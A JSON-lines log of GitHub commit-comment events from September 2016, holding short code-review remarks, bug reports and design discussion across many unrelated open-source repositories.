{"id":"4518102043","type":"CommitCommentEvent","actor":{"login":"mohierf"},"repo":{"name":"Alignak-monitoring-contrib/alignak-backend"},"payload":{"comment":{"id":18903216,"position":null,"line":null,"path":null,"commit_id":"87410088b9ca5128d8dc4f794d39019d58249f91","created_at":"2016-09-05T19:14:56Z","updated_at":"2016-09-05T19:14:56Z","body":"Ok"}},"created_at":"2016-09-05T19:14:56Z"}
{"id":"4518102363","type":"CommitCommentEvent","actor":{"login":"xpinjection"},"repo":{"name":"xpinjection/java8-misuses"},"payload":{"comment":{"id":18903218,"position":17,"line":21,"path":"src/com/xpinjection/java8/misused/stream/ManualCollection.java","commit_id":"5370318d2c96e934a4b0346727417479a3af0a2a","created_at":"2016-09-05T19:15:07Z","updated_at":"2016-09-05T19:15:07Z","body":"What example does cover this one?"}},"created_at":"2016-09-05T19:15:07Z"}
{"id":"4518103126","type":"CommitCommentEvent","actor":{"login":"kartikay101"},"repo":{"name":"kartikay101/SRM-AUV"},"payload":{"comment":{"id":18903220,"position":6,"line":22,"path":"MAIN_TASK/PID_question/codePID/codePID.ino","commit_id":"ff999dd2b17fe9e267289d0a579dc42967af7c26","created_at":"2016-09-05T19:15:26Z","updated_at":"2016-09-05T19:15:26Z","body":"Only pressed an extra enter "}},"created_at":"2016-09-05T19:15:26Z"}
{"id":"4518108265","type":"CommitCommentEvent","actor":{"login":"ronnyb29"},"repo":{"name":"medhacks/SplashPage2k16"},"payload":{"comment":{"id":18903227,"position":null,"line":null,"path":null,"commit_id":"4867b2aedb5f571ec8613fad6b37dab44747b680","created_at":"2016-09-05T19:17:40Z","updated_at":"2016-09-05T19:17:40Z","body":"hahahaha this is great"}},"created_at":"2016-09-05T19:17:40Z"}
{"id":"4518108868","type":"CommitCommentEvent","actor":{"login":"searum"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18903229,"position":null,"line":null,"path":null,"commit_id":"1e323a10dfb3b41e9dba0223a46ac2abe2928ee6","created_at":"2016-09-05T19:17:54Z","updated_at":"2016-09-05T19:17:54Z","body":"it has to be send by spell in this case 228520\r\n\r\nID - 228520 Demon Hunter: Initial Spell\r\n=================================================\r\nEffect 0: Id 45 (SPELL_EFFECT_PLAY_MOVIE) DIFFICULTY_NONE\r\nBasePoints = 0\r\nTargets (1, 0) (TARGET_UNIT_CASTER, NO_TARGET)\r\nEffectMiscValueA = 469"}},"created_at":"2016-09-05T19:17:54Z"}
{"id":"4518110246","type":"CommitCommentEvent","actor":{"login":"excalibur1234"},"repo":{"name":"excalibur1234/pacli-simple"},"payload":{"comment":{"id":18903231,"position":null,"line":null,"path":null,"commit_id":"3349e026d1ea3e5c1c6be1e23d0f8bf82ff5d090","created_at":"2016-09-05T19:18:32Z","updated_at":"2016-09-05T19:18:32Z","body":"thanks for the link.\r\n\r\nbefore i have done the changes in this commit, i have read [this link](https://stackoverflow.com/questions/669452/is-preferable-over-in-bash-scripts) and some other pages on the matter. your link is a good example of pages, which explain the difference.\r\n\r\ni have done a little further fixing after i have read your link, but now everything should work."}},"created_at":"2016-09-05T19:18:32Z"}
{"id":"4518111724","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18903232,"position":37,"line":37,"path":"pkgs/development/compilers/llvm/3.9/clang/default.nix","commit_id":"15af9082ebeb2aece84e426daf7185715cfbb203","created_at":"2016-09-05T19:19:16Z","updated_at":"2016-09-05T19:19:16Z","body":"why did you change this to be hardcoded to 3.9 instead of using `${version}` like 3.8/clang/default.nix does?"}},"created_at":"2016-09-05T19:19:16Z"}
{"id":"4518112560","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"cyberblast/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18903234,"position":null,"line":null,"path":null,"commit_id":"5a60a8c2614d649b0e9c0089a39fcb3461827c79","created_at":"2016-09-05T19:19:39Z","updated_at":"2016-09-05T19:19:39Z","body":"Oops wrong button. description incomplete. \r\nContents of the commit: \r\n* room.js cleanup\r\n* bugfix with sources with only 1 accessible field\r\n* further improvement of the upgrader\r\n* different worker behavior when invaders coming"}},"created_at":"2016-09-05T19:19:39Z"}
{"id":"4518112811","type":"CommitCommentEvent","actor":{"login":"Partizanin"},"repo":{"name":"Partizanin/angularServletTest"},"payload":{"comment":{"id":18903235,"position":32,"line":22,"path":"web/index.html","commit_id":"dbdd34c35d28b5e9be4fcef39cab41eae322bdef","created_at":"2016-09-05T19:19:47Z","updated_at":"2016-09-05T19:19:47Z","body":"Потрібно замінити `<img src=\"{{film.imageUrl}}\" alt=\"{{film.name}}\">` на `<img ng-src=\"{{film.imageUrl}}\" alt=\"{{film.name}}\">`\r\n\r\n[Ось підтверлження](https://youtu.be/d_t1pM70vCI?t=4m16s)\r\n#Must Do"}},"created_at":"2016-09-05T19:19:47Z"}
{"id":"4518114357","type":"CommitCommentEvent","actor":{"login":"hackthelegacy"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18903236,"position":null,"line":null,"path":null,"commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-05T19:20:25Z","updated_at":"2016-09-05T19:20:25Z","body":"Format changed in ibmiscanner tooling to follow your remarks. Let me know if you decide to change the sequence of userid and hash ;-)\r\n\r\nExamples of hashes:\r\n[DES-hashes.txt](https://github.com/magnumripper/JohnTheRipper/files/455532/DES-hashes.txt)\r\n\r\nRegarding the questions on passwords: the passwords on AS/400 stored using DES are always uppercase, may use the following chars: A-Z, 0-9, @, $, # or underscore ( _ ). The passwords cannot start with digit (0-9) or underscore ( _ )."}},"created_at":"2016-09-05T19:20:25Z"}
{"id":"4518115220","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":18903239,"position":7,"line":148,"path":"vis/tests/test_new_ngram.py","commit_id":"f603f28550324fa42e15c5589a920b480934777b","created_at":"2016-09-05T19:20:47Z","updated_at":"2016-09-05T19:20:47Z","body":"I don't understand how this is a meaningful check for 'vagueness', 'incorrectness', or 'misleadingness'. It seems to me that you're just checking that the error message is a copy of the string that was passed into it. There's not even any variable insertion to change the output in response to changing input. Testing `\"foo\" == \"foo\"` seems a bit odd."}},"created_at":"2016-09-05T19:20:47Z"}
{"id":"4518116460","type":"CommitCommentEvent","actor":{"login":"Shauren"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18903242,"position":null,"line":null,"path":null,"commit_id":"805637cea15470dac4b9417494e4d89f1c1d3239","created_at":"2016-09-05T19:21:23Z","updated_at":"2016-09-05T19:21:23Z","body":"Constant reversed from client."}},"created_at":"2016-09-05T19:21:23Z"}
{"id":"4518116960","type":"CommitCommentEvent","actor":{"login":"DerTeufel"},"repo":{"name":"visi0nary/android_kernel_elephone_p8000"},"payload":{"comment":{"id":18903243,"position":null,"line":null,"path":null,"commit_id":"eb8f75c5629102e5afaf4038c9c99589e672cb3c","created_at":"2016-09-05T19:21:37Z","updated_at":"2016-09-05T19:21:37Z","body":"I once got told, this commit only being useful if hz = 100"}},"created_at":"2016-09-05T19:21:37Z"}
{"id":"4518117637","type":"CommitCommentEvent","actor":{"login":"VsnGamer"},"repo":{"name":"NovaMods/nova-renderer"},"payload":{"comment":{"id":18903245,"position":null,"line":null,"path":null,"commit_id":"22ef915aa467337668f6010f75186405eb5d1eaa","created_at":"2016-09-05T19:21:57Z","updated_at":"2016-09-05T19:21:57Z","body":"wat xD"}},"created_at":"2016-09-05T19:21:57Z"}
{"id":"4518118789","type":"CommitCommentEvent","actor":{"login":"heathermhargreaves"},"repo":{"name":"HomeBuyerDevMtn/HomeBuyer"},"payload":{"comment":{"id":18903248,"position":null,"line":null,"path":null,"commit_id":"2730988bc98a79f581fe521f821bd8f9ba28bcf2","created_at":"2016-09-05T19:22:23Z","updated_at":"2016-09-05T19:22:23Z","body":"Immediately deleted compromised keys in AWS"}},"created_at":"2016-09-05T19:22:23Z"}
{"id":"4518119727","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":18903253,"position":6,"line":12,"path":"country_filter.rb","commit_id":"d8d43109c20d8327f0a252fc48d694950a900057","created_at":"2016-09-05T19:22:49Z","updated_at":"2016-09-05T19:22:49Z","body":"ну дык! :+1:  \r\nтолько: \r\n* промежуточная переменная лишняя (всё тело метода просто — `@collection.select....`)\r\n* можно же заюзать `@collection.filter(country: c)`\r\n* хорошо бы проверить (и тест про это написать), что наш method_missing не словил чёто неожиданное, типа `movies.country.uk = 'US'` (а это ж тоже будет просто вызов метода, и результат будет странен пользователю ;))"}},"created_at":"2016-09-05T19:22:49Z"}
{"id":"4518120352","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18903255,"position":null,"line":null,"path":null,"commit_id":"d59298a56c7b30403e0db0682f4d8f01b270c39b","created_at":"2016-09-05T19:23:07Z","updated_at":"2016-09-05T19:23:07Z","body":"i also think the entries en pkgs  specs table should prefer rootfs-packages... is a rootfs-package  supposed to work in all woofce puppies?\r\n\r\ni see micko has already  implemented an alternative in rationalise.."}},"created_at":"2016-09-05T19:23:07Z"}
{"id":"4518124104","type":"CommitCommentEvent","actor":{"login":"rochacbruno"},"repo":{"name":"rochacbruno/python-pagseguro"},"payload":{"comment":{"id":18903260,"position":null,"line":null,"path":null,"commit_id":"264cc7972d08b1339d09c3be8686850c0ff94eb1","created_at":"2016-09-05T19:24:44Z","updated_at":"2016-09-05T19:24:44Z","body":"@arthurbarros nada em especial, apenas durante a revisão achei melhor remover. O UOL continua não facilitando muito a vida de quem é developer, mas pelo menos agora tem sandbox."}},"created_at":"2016-09-05T19:24:44Z"}
{"id":"4518124887","type":"CommitCommentEvent","actor":{"login":"EnzoAliatis"},"repo":{"name":"EnzoAliatis/hello-world"},"payload":{"comment":{"id":18903264,"position":null,"line":null,"path":null,"commit_id":"d2c9bee6f5d428a72c6cf0df44a92ea826ea524e","created_at":"2016-09-05T19:25:06Z","updated_at":"2016-09-05T19:25:06Z","body":"no creo "}},"created_at":"2016-09-05T19:25:06Z"}
{"id":"4518126154","type":"CommitCommentEvent","actor":{"login":"bianchimro"},"repo":{"name":"matthiask/plata"},"payload":{"comment":{"id":18903270,"position":null,"line":null,"path":null,"commit_id":"e60c7a28c7249ccb7b9a9561e03d68d5291558f6","created_at":"2016-09-05T19:25:39Z","updated_at":"2016-09-05T19:25:39Z","body":"closes #78 "}},"created_at":"2016-09-05T19:25:39Z"}
{"id":"4518128017","type":"CommitCommentEvent","actor":{"login":"maziminke"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18903273,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-05T19:26:30Z","updated_at":"2016-09-05T19:26:30Z","body":"I have never seen those warnings flashing up so we can either just \nrevert this or check what can be done to have a backward compatible \nsolution.\n\nAm 05.09.2016 um 20:45 schrieb Olle Härstedt:\n>\n> This version is no longer feature frozen. Still, the HTML should be \n> stable, yes.\n>\n> I did this change since the warning always was showed for a fraction \n> of a second, on each page reload in front-end. I was hoping no one \n> made a custom styling of this... We can discuss it further at the \n> meeting tomorrow if you want to.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/LimeSurvey/LimeSurvey/commit/b1c10d5d9f5f4f0e482c071bce787aee3864bdad#commitcomment-18903043>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/ABXugo3VcVhZFBn7ViHHIlhDQg-TihKuks5qnGNVgaJpZM4J1Qns>.\n>\n\n"}},"created_at":"2016-09-05T19:26:30Z"}
{"id":"4518128096","type":"CommitCommentEvent","actor":{"login":"my-instantcms"},"repo":{"name":"instantsoft/icms2-json-api-component"},"payload":{"comment":{"id":18903274,"position":null,"line":null,"path":null,"commit_id":"ac940f3d3f3996a19b9c106e18d5343990fbdd96","created_at":"2016-09-05T19:26:33Z","updated_at":"2016-09-05T19:26:33Z","body":"Здравствуйте.\r\nВ БД в таблицу logs записывается пустое значение в поле key_id и на главной админке, получаем ошибку в запросе БД\r\nUnknown column 'i.0' in 'where clause'\r\n```\r\nSELECT date_pub as date, COUNT(1) as count\r\nFROM cms_api_logs i\r\nWHERE (i.date_pub >= (CURDATE() - INTERVAL 365 DAY)) AND (i.0 = '')\r\nGROUP BY MONTH(date_pub)\r\nORDER BY i.date_pub asc\r\nLIMIT 1000\r\n```"}},"created_at":"2016-09-05T19:26:33Z"}
{"id":"4518130682","type":"CommitCommentEvent","actor":{"login":"reisenberger"},"repo":{"name":"brunolauze/Polly"},"payload":{"comment":{"id":18903283,"position":null,"line":null,"path":null,"commit_id":"e58f131a27f8ecea93b6b57ecc03fec892cb9143","created_at":"2016-09-05T19:27:47Z","updated_at":"2016-09-05T19:27:47Z","body":"Hi @brunolauze \r\nI'm wondering if the idea of `MaxQueuedActions` wasn't very clear in [the original proposal](https://github.com/App-vNext/Polly/issues/138).  Below is a metaphor which I was planning for doco.  What do you think?\r\n\r\nIf you have time available, would you be interested in refining the `ThrottlePolicy` implementation along these lines?\r\n\r\n## ThrottlePolicy as nightclub bouncer\r\n\r\nLike a bouncer on the door of a nightclub, the `ThrottlePolicy` has three main aims:\r\n \r\n+ to ensure the club never exceeds capacity inside [limit the number of concurrent executions] \r\n+ if the club is full, to ensure there is a supply of punters waiting on the pavement, ready to take the place of anyone who leaves [maximise throughput] \r\n+ but to balance expectations by not letting that queue of punters on the pavement get too long [reject executions if the queue for the parallelization throttle is full]\r\n \r\nThe `MaxParallelization` semaphore is the unbreachable limit on the number of punters inside the club.  \r\nThe `MaxQueuedActions` semaphore is the limit on the number of punters in the queue on the pavement.  \r\n \r\n#### Implementation\r\n\r\nWhen an execution is queued to the throttle, if the queue-on-the-pavement is full, we want to turn punters away straight away (we don’t want to have a “queue for the queue”).  So the policy rejects executions with a zero timeout, if the semaphore on `MaxQueuedActions` cannot be obtained.\r\n\r\nOnce a punter is permitted into the queue on the pavement, however, as bouncer/`ThrottlePolicy`, we don’t care how long they spend waiting to get into the club - we just want to be sure we have a sufficient supply of punters ready to take the place of anyone who leaves.  So the wait to acquire the `MaxParallelization` semaphore has no timeout.  \r\n\r\n(Those punters in the queue may have their _own_ opinion about how long to wait - the `ThrottlePolicy` may be wrapped in a `TimeoutPolicy` - but that’s not the `ThrottlePolicy`’s business.)\r\n \r\n(( The fastest implementation is probably to maintain the pavement semaphore as a semaphore of capacity `MaxParallelization + MaxQueuedActions`, and obtain/release it per incoming request (rather than any forking code - if even possible - to decide whether to obtain/release the pavement semaphore according to whether the club semaphore is full or not). ))\r\n\r\n#### Why the pavement queue?\r\n \r\nThe queue-on-the-pavement allows us to maximise throughput through the throttle.  Without it, we might reject a punter/request – then have somebody leave the club microseconds afterwards – and not have the next request arrive for, say, another few seconds.  In that case, we would have crreated idle capacity in the throttle, and rejected a request perhaps too eagerly.  If we’d let even a few requests 'queue on the pavement' outside the parallelization throttle, they could have executed as soon as a slot became free. \r\n\r\n#### CPU-bound work\r\n\r\nThis approach makes particular sense for CPU bound work.  For CPU bound work, performance can often be improved by limiting parallelization to the number of cores available on the host (`Environment.ProcessorCount`), or some small multiple of it.  Beyond a certain sweet spot, allowing extra parallelization actually hurts performance rather than improves it.  While this might seem counter-intuitive, it improves performance of CPU-bound code (even though more requests may be asked initially to queue) as the tight throttle prevents or reduces the overhead of context-switching on individual threads. \r\n \r\n#### IO-bound work\r\n\r\nFor I/O bound work, the picture is different.  Many requests may potentially be on an `await` statement at any one time, waiting for I/O to complete.  The `MaxParallelization` of a throttle should then clearly be set considerably higher than cores in the host environment, to allow threads to be re-purposed.\r\n\r\nIn the async I/O case, is it worth using the queue-for-the-throttle?  It may not be.  Rather than, say, have a `MaxParallelization` of 80 and a further `MaxQueuedActions` of 20 waiting for the main semaphore, it is probably more efficient to have a main throttle capacity of 100 and queue of 0, and let the runtime maximise the throughput.  The overall `MaxParallelization` limit of the `Throttle` however remains important.  This is what provides bulkhead isolation - prevents the function running away consuming all resources of its host, if flooded by unserviceable requests.\r\n\r\n#### Configuration and tuning\r\n\r\n[to write up, for eventual documentation]"}},"created_at":"2016-09-05T19:27:47Z"}
{"id":"4518131831","type":"CommitCommentEvent","actor":{"login":"ingver"},"repo":{"name":"ingver/parse-lib"},"payload":{"comment":{"id":18903284,"position":null,"line":null,"path":null,"commit_id":"c3f30248935e07a5a6a756994d46f7c4bda3b647","created_at":"2016-09-05T19:28:20Z","updated_at":"2016-09-05T19:28:20Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;yK7vC8An&#x2F;8-repo\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Repo</a>"}},"created_at":"2016-09-05T19:28:20Z"}
{"id":"4518131924","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-morse"},"payload":{"comment":{"id":18903285,"position":null,"line":null,"path":null,"commit_id":"e7ebe32bb9e319d3f542fce756b43f45691218c1","created_at":"2016-09-05T19:28:22Z","updated_at":"2016-09-05T19:28:22Z","body":"@gasinvein The dependence is optional and this software is not released yet either.\r\n\r\nI added ContactGroups interface to telepathy-qt after 0.9.7 release and in this commit I *fixed* compilation with 0.9.7 release by bundling a shallow copy of the interface implementation."}},"created_at":"2016-09-05T19:28:22Z"}
{"id":"4518133935","type":"CommitCommentEvent","actor":{"login":"dbarashev"},"repo":{"name":"bardsoftware/ace"},"payload":{"comment":{"id":18903291,"position":33,"line":141,"path":"lib/ace/ext/papeeria/tex_completer.coffee","commit_id":"6937a782883e825872d1f54ed04bfa076c5f0734","created_at":"2016-09-05T19:29:15Z","updated_at":"2016-09-05T19:29:15Z","body":"please remove this code from this pull request. We really want to merge this PR sooner rather than later. Every piece of new code moves this goal away in time."}},"created_at":"2016-09-05T19:29:15Z"}
{"id":"4518134031","type":"CommitCommentEvent","actor":{"login":"evgenyrodionov"},"repo":{"name":"Safort/cards"},"payload":{"comment":{"id":18903292,"position":9,"line":9,"path":"src/js/actions/countryActions.js","commit_id":"eddbb7be1c0a4d558eb7d83ea23c2e92e84a4214","created_at":"2016-09-05T19:29:17Z","updated_at":"2016-09-05T19:29:17Z","body":"Зачем отправлять пейлоад с нулл?"}},"created_at":"2016-09-05T19:29:17Z"}
{"id":"4518135221","type":"CommitCommentEvent","actor":{"login":"evgenyrodionov"},"repo":{"name":"Safort/cards"},"payload":{"comment":{"id":18903294,"position":1,"line":1,"path":"src/js/components/ui/index.js","commit_id":"eddbb7be1c0a4d558eb7d83ea23c2e92e84a4214","created_at":"2016-09-05T19:29:49Z","updated_at":"2016-09-05T19:29:49Z","body":"В пекейдж джсон у тебя нет зависимости"}},"created_at":"2016-09-05T19:29:49Z"}
{"id":"4518136326","type":"CommitCommentEvent","actor":{"login":"bretcope"},"repo":{"name":"NFig/NFig"},"payload":{"comment":{"id":18903297,"position":null,"line":null,"path":null,"commit_id":"5354020f121d2bd9bb2f0ca9ef6357d2773ee7b3","created_at":"2016-09-05T19:30:19Z","updated_at":"2016-09-05T19:30:19Z","body":"@rossipedia as a proof of concept, working on this is great. Keep in mind that I have a [ton of changes](https://github.com/NFig/NFig/compare/subapp) which will be landing soon-ish, and there will be quite a lot of merge conflicts with this branch.\r\n\r\nAlso, I kind of think we should wait for .NET Core 1.1 ([supposedly coming this fall](https://github.com/dotnet/core/blob/master/roadmap.md)) before supporting it because they're [making things much more compatible with .NET Framework](https://blogs.msdn.microsoft.com/dotnet/2016/05/27/making-it-easier-to-port-to-net-core/). For example, `.GetTypeInfo()` is going away, and I believe `project.json` is going away as well (everything is going back to .csproj, for better or worse)."}},"created_at":"2016-09-05T19:30:19Z"}
{"id":"4518137812","type":"CommitCommentEvent","actor":{"login":"dchest"},"repo":{"name":"dchest/scrypt-async-js"},"payload":{"comment":{"id":18903300,"position":null,"line":null,"path":null,"commit_id":"4b365e51b412284fb56d40675de134a3694bfabb","created_at":"2016-09-05T19:30:56Z","updated_at":"2016-09-05T19:30:56Z","body":"See #29 and this: \r\n<img width=\"547\" alt=\"screen shot 2016-09-05 at 21 29 34\" src=\"https://cloud.githubusercontent.com/assets/52677/18256026/049da278-73b0-11e6-9dbf-b9f7ec10e256.png\">\r\n"}},"created_at":"2016-09-05T19:30:56Z"}
{"id":"4518140628","type":"CommitCommentEvent","actor":{"login":"vukivan"},"repo":{"name":"zeress/CK2Plus"},"payload":{"comment":{"id":18903306,"position":14,"line":59,"path":"CK2Plus/localisation/00_CK2Plus_cultures.csv","commit_id":"1ac43d14303ecb14ccea8b4db96d89b688c64c74","created_at":"2016-09-05T19:32:10Z","updated_at":"2016-09-05T19:32:10Z","body":"Ooops?"}},"created_at":"2016-09-05T19:32:10Z"}
{"id":"4518142075","type":"CommitCommentEvent","actor":{"login":"Safort"},"repo":{"name":"Safort/cards"},"payload":{"comment":{"id":18903315,"position":9,"line":9,"path":"src/js/actions/countryActions.js","commit_id":"eddbb7be1c0a4d558eb7d83ea23c2e92e84a4214","created_at":"2016-09-05T19:32:48Z","updated_at":"2016-09-05T19:32:48Z","body":"Привычка. Раньше в каком-то проекте это увидел и сейчас так тоже юзаю. Хотя да, это совсем лишнее."}},"created_at":"2016-09-05T19:32:48Z"}
{"id":"4518142876","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":18903318,"position":5,"line":214,"path":"js/client.js","commit_id":"eec3263538520ba93aff4876a18753f7572b8ab2","created_at":"2016-09-05T19:33:11Z","updated_at":"2016-09-05T19:33:11Z","body":"I'll do that when I see one with different capitalization, I guess."}},"created_at":"2016-09-05T19:33:11Z"}
{"id":"4518143383","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":18903320,"position":18,"line":222,"path":"js/client.js","commit_id":"eec3263538520ba93aff4876a18753f7572b8ab2","created_at":"2016-09-05T19:33:23Z","updated_at":"2016-09-05T19:33:23Z","body":"yes I am -_-"}},"created_at":"2016-09-05T19:33:23Z"}
{"id":"4518146986","type":"CommitCommentEvent","actor":{"login":"gasinvein"},"repo":{"name":"TelepathyQt/telepathy-morse"},"payload":{"comment":{"id":18903330,"position":null,"line":null,"path":null,"commit_id":"e7ebe32bb9e319d3f542fce756b43f45691218c1","created_at":"2016-09-05T19:35:01Z","updated_at":"2016-09-05T19:35:01Z","body":"@Kaffeine, will some features be missing with 0.9.7 (instead of 0.9.8)?\n"}},"created_at":"2016-09-05T19:35:01Z"}
{"id":"4518150937","type":"CommitCommentEvent","actor":{"login":"meoweg"},"repo":{"name":"artiator/artiator-database"},"payload":{"comment":{"id":18903340,"position":null,"line":null,"path":null,"commit_id":"3a0439461d83fa7a0eef8f8d21056286267eb540","created_at":"2016-09-05T19:36:40Z","updated_at":"2016-09-05T19:36:40Z","body":"You forgot to add index"}},"created_at":"2016-09-05T19:36:40Z"}
{"id":"4518151518","type":"CommitCommentEvent","actor":{"login":"bluedrops"},"repo":{"name":"acm-uiuc/rp2016"},"payload":{"comment":{"id":18903345,"position":null,"line":null,"path":null,"commit_id":"fe03fbaacdad055d63f9aeb17e401123e271c2b1","created_at":"2016-09-05T19:36:57Z","updated_at":"2016-09-05T19:36:57Z","body":"that'd be me; thanks <3 "}},"created_at":"2016-09-05T19:36:57Z"}
{"id":"4518153185","type":"CommitCommentEvent","actor":{"login":"binarymaster"},"repo":{"name":"adplug/adplug"},"payload":{"comment":{"id":18903350,"position":5,"line":65,"path":"src/adtrack.cpp","commit_id":"65a5c82045003c6afd8e66babe123b577e49e0db","created_at":"2016-09-05T19:37:44Z","updated_at":"2016-09-05T19:37:44Z","body":"You're right, `instf` can be null.\r\n\r\nI really need more practice on C++ :sweat_smile:  "}},"created_at":"2016-09-05T19:37:44Z"}
{"id":"4518155532","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"hsmade/md380tools"},"payload":{"comment":{"id":18903353,"position":17,"line":75,"path":"applet/src/rtc_timer.c","commit_id":"63228b49bc916b240eded0dcbcaa269587ba4dc6","created_at":"2016-09-05T19:38:48Z","updated_at":"2016-09-05T19:38:48Z","body":"@hsmade ... you know:\r\nvoid gfx_blockfill(int xmin, int ymin, int xmax, int ymax);\r\nI think this is better to clear the screen..  \r\n"}},"created_at":"2016-09-05T19:38:48Z"}
{"id":"4518159140","type":"CommitCommentEvent","actor":{"login":"crantila"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":18903356,"position":7,"line":148,"path":"vis/tests/test_new_ngram.py","commit_id":"f603f28550324fa42e15c5589a920b480934777b","created_at":"2016-09-05T19:40:34Z","updated_at":"2016-09-05T19:40:34Z","body":"You're right that this, in itself, isn't going to prevent vagueness, incorrectness, or misleadingness. It's partly about the process: testing the error message is a reminder that every error condition should have a distinct, clear, and specific message.\r\n\r\nMoreover, as I mentioned, testing the error message helps ensure that the test is failing for the right reason. Checking the error message in this test is the easiest way to guarantee that the `RuntimeWarning` is raised by [line 199](https://github.com/ELVIS-Project/vis-framework/blob/f603f28550324fa42e15c5589a920b480934777b/vis/analyzers/indexers/new_ngram.py#L199) rather than [line 235](https://github.com/ELVIS-Project/vis-framework/blob/f603f28550324fa42e15c5589a920b480934777b/vis/analyzers/indexers/new_ngram.py#L199). It protects against misconfigured tests, which I've found to be problematic when testing and refactoring complicated methods like the one here.\r\n\r\nReducing this test to `\"foo\" == \"foo\"` misses the point. If you can suggest more effective ways to accomplish my goals here, I'd be happy to hear them, especially if it helps the test *look like* it's doing what I wanted it to do."}},"created_at":"2016-09-05T19:40:34Z"}
{"id":"4518166811","type":"CommitCommentEvent","actor":{"login":"andrewgale1"},"repo":{"name":"andrewgale1/JS_drill_dropMenu"},"payload":{"comment":{"id":18903369,"position":null,"line":null,"path":null,"commit_id":"d51da836d5c75230251ff687a4678185a9b51278","created_at":"2016-09-05T19:44:12Z","updated_at":"2016-09-05T19:44:12Z","body":"thanks to Dylan (https://github.com/dzdykes) for the help"}},"created_at":"2016-09-05T19:44:12Z"}
{"id":"4518167434","type":"CommitCommentEvent","actor":{"login":"rschoem"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18903371,"position":null,"line":null,"path":null,"commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-05T19:44:31Z","updated_at":"2016-09-05T19:44:31Z","body":"@hackthelegacy I think you should add a wordlist as well ;-)"}},"created_at":"2016-09-05T19:44:31Z"}
{"id":"4518169050","type":"CommitCommentEvent","actor":{"login":"fyvfyv"},"repo":{"name":"htmlacademy-htmlcss/179111-device"},"payload":{"comment":{"id":18903372,"position":32,"line":367,"path":"index.html","commit_id":"98cb62f4c4a640cac7fa434e9f0f20c7691b0b81","created_at":"2016-09-05T19:45:18Z","updated_at":"2016-09-05T19:45:18Z","body":"Сначала подключаем, а потом используем в своем скрипте"}},"created_at":"2016-09-05T19:45:18Z"}
{"id":"4518169353","type":"CommitCommentEvent","actor":{"login":"dsifford"},"repo":{"name":"visiblevc/wordpress-starter"},"payload":{"comment":{"id":18903374,"position":7,"line":163,"path":"run.sh","commit_id":"b09aeceb759cb48cc9168fdee33e537603347f6e","created_at":"2016-09-05T19:45:26Z","updated_at":"2016-09-05T19:45:26Z","body":"Assignment happening in this expression."}},"created_at":"2016-09-05T19:45:26Z"}
{"id":"4518169516","type":"CommitCommentEvent","actor":{"login":"fyvfyv"},"repo":{"name":"htmlacademy-htmlcss/179111-device"},"payload":{"comment":{"id":18903376,"position":23,"line":319,"path":"index.html","commit_id":"98cb62f4c4a640cac7fa434e9f0f20c7691b0b81","created_at":"2016-09-05T19:45:30Z","updated_at":"2016-09-05T19:45:30Z","body":"`type`?"}},"created_at":"2016-09-05T19:45:30Z"}
{"id":"4518169783","type":"CommitCommentEvent","actor":{"login":"jjaffeux"},"repo":{"name":"SamSaffron/DiscourseMobile"},"payload":{"comment":{"id":18903377,"position":18,"line":57,"path":"js/site.js","commit_id":"5c971a855c6227ccbd2caa005bac1fe43a229902","created_at":"2016-09-05T19:45:36Z","updated_at":"2016-09-05T19:45:36Z","body":"@SamSaffron is this ever reached? (same at line 62)"}},"created_at":"2016-09-05T19:45:36Z"}
{"id":"4518170338","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"dchest/scrypt-async-js"},"payload":{"comment":{"id":18903379,"position":null,"line":null,"path":null,"commit_id":"4b365e51b412284fb56d40675de134a3694bfabb","created_at":"2016-09-05T19:45:50Z","updated_at":"2016-09-05T19:45:50Z","body":"naaaa, you probably created a free account, but you can use the open source account that is free forevah!\r\n\r\nhttps://saucelabs.com/open-source"}},"created_at":"2016-09-05T19:45:50Z"}
{"id":"4518170846","type":"CommitCommentEvent","actor":{"login":"fyvfyv"},"repo":{"name":"htmlacademy-htmlcss/179111-device"},"payload":{"comment":{"id":18903382,"position":22,"line":318,"path":"index.html","commit_id":"98cb62f4c4a640cac7fa434e9f0f20c7691b0b81","created_at":"2016-09-05T19:46:04Z","updated_at":"2016-09-05T19:46:04Z","body":"А разве нужно делать отдельный див? А прямо в `popup-map-big` нельзя?"}},"created_at":"2016-09-05T19:46:04Z"}
